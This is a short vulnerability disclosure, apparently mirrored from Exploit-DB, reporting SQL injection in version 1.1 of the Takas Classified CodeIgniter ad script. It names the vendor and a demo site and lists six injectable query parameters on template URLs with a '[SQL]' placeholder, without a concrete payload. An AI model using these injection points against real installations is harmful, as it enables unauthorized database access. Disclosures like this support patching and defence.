Takas Classified 1.1 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-02-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41295/
  • # # # # # 
    # Exploit Title: Takas Classified – Codeigniter PHP Classified Ad Script v1.1 - SQL Injection
    # Google Dork: N/A
    # Date: 10.02.2017
    # Vendor Homepage: http://artifectx.com/
    # Software Buy: https://codecanyon.net/item/takas-classified-codeigniter-php-classified-ad-script/15227824
    # Demo: http://takas.artifectx.com/
    # Version: 1.1
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/index.php/classified_ads/ads/?&subcatid=[SQL]
    # http://localhost/[PATH]/index.php/classified_ads/ads/?&catid=[SQL]
    # http://localhost/[PATH]/index.php/classified_ads/ads/?&locid=[SQL]
    # http://localhost/[PATH]/index.php/classified_ads/ads/?&areaid=[SQL]
    # http://localhost/[PATH]/index.php/classified_ads/ads/?&type=[SQL]
    # http://localhost/[PATH]/index.php/classified_ads/ads/?&post=[SQL]
    # Etc... Etc...
    # # # # #